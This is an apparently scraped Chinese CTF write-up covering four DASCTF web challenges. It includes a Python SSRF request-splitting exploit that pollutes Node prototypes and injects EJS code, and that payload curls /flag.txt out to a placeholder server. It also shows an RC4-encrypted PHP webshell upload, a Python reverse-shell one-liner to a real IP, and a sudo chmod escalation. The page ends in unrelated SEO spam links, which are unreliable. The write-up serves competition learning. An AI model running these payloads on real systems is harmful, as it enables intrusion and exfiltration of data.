当前位置: 首页 > news >正文

网站基础设施建设app推广员怎么做

news 2025/12/18 20:03:24
网站基础设施建设,app推广员怎么做,wordpress网站 华为,WordPress 云 memcacheNode Magical Login 简单的js代码审计。 Flag分成了两部分。 第一部分: 这里就简单的判断了一下user是否等于admin,直接绕过。 第二部分: checkcode ! “aGr5AtSp55dRacer”,让其为真,利用数组绕过。 Flag为&#x…

Node Magical Login

简单的js代码审计。

Flag分成了两部分。

第一部分:

image-20230212211609948

这里就简单的判断了一下user是否等于admin,直接绕过。

image-20230212211635351

第二部分:

image-20230212211645097

checkcode !== “aGr5AtSp55dRacer”,让其为真,利用数组绕过。

image-20230212211657153

Flag为:DASCTF{235657355 32540557696203746863296}

real_ez_node

找到类似的题目。

几道nodejs题目的分析_GAPPPPP的博客-CSDN博客_nodejs ssrf

里边Node Game这一道也是ssrf。

修改一下里边的代码,利用ssrf打原型链污染,然后ejs模板注入。

Exp:

import requests
import urllib.parsedef encode(a):tmp = u""for i in a:tmp += chr(0x0100+ord(i))return tmppayload = ''' HTTP/1.1POST /copy HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.76
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Connection: close
Content-Length: 170{"constructor.prototype.outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('curl http://vps:port -F xx=@/flag.txt');var __tmp2"}
GET / HTTP/1.1
test:'''.replace("\n","\r\n")
payload = encode(payload)
re = requests.get('http://3000.endpoint-9a3d98e7aaf647ae8c64b7007bfc464b.m.ins.cloud.dasctf.com:81/curl?q=' + urllib.parse.quote(payload))
print(re.text)

image-20230212211747125

Flag为:DASCTF{10034776926713905225407173576398}

扭转乾坤

大写一个F即可

image-20230212211811179

DASCTF{407a13a21a6b85b1236b003479468c82}

unusual php

phpinfo发现test的拓展

image-20230212211827292

读php.ini

image-20230212211836461

读取so文件

http://url/?a=read&file=php://filter/convert.base64-encode/resource=/usr/local/lib/php/extensions/no-debug-non-zts-20190902/zend_test.so

反编译看一下存在对文件进行rc4解密操作

image-20230212211902335

那就对一句话rc4加密

image-20230212211912739

base64解码后保存为exp.php,上传发现需要提权

python -c “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("81.69.247.186",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image-20230212211938045

尝试使用sudo发现tty问题,使用python加载一个pty

python3 -c 'import pty;pty.spawn("/bin/sh")'

image-20230212211957870

sudo进行cat,发现需要密码,在etc目录发现sudoers.bak备份文件,发现www用户chmod不需要密码

image-20230212212017741

直接上权限,读flag

flag为:DASCTF{20663467266566204775890084453113}

http://www.wangmingla.cn/news/144496.html

相关文章:

  • 网站建设服装在线商城实训报告网站是如何建立的
  • 为公司建立网站企业网站设计思路
  • 合肥市中小企业局网站低价刷赞网站推广
  • 企业网站制作前期需要什么资料软件开发网
  • 服装外贸网站建设廊坊seo网络推广
  • 如何做网站图标站长工具综合查询ip
  • 网站制作五个界面爱站网使用体验
  • 黑龙江网站建设seo是什么意思怎么解决
  • 网站直播怎么做的宁波seo关键词优化教程
  • 厦门网站建设价chrome 谷歌浏览器
  • 能领免做卡的网站百度seo排名优化技巧分享
  • 怎么在ps做网站首页重庆森林经典台词 凤梨罐头
  • 杭州 网站建设公司站长工具seo综合查询5g
  • 购物网站开发面试站长工具app
  • 南通网站制作哪个好网页设计可以自学吗
  • 南京做网站最好的公司seo计费系统源码
  • 阿里云备案 网站服务内容网络推广中心
  • 广东哪家网站建设哪家公司好dreamweaver网页制作
  • 公司网站一年费用双滦区seo整站排名
  • 开发公司组织架构及岗位职责临沂seo排名外包
  • 怎么做淘宝网站泰州网站排名seo
  • 如何维护自己公司的网站沧州网站seo公司
  • 网站建设话术b2b网站免费推广
  • 学网站建设 赚钱360优化大师官方下载手机
  • 网站开发的意义上海seo网站推广
  • 兼职做效果图的网站有哪些优化排名推广教程网站
  • 分析网站设计链接提取视频的网站
  • 企业组网设计杭州优化seo
  • 电子商务网站建设实训报告文章2023最近的新闻大事10条
  • 国外免费网站域名服务器入口优化大师官方网站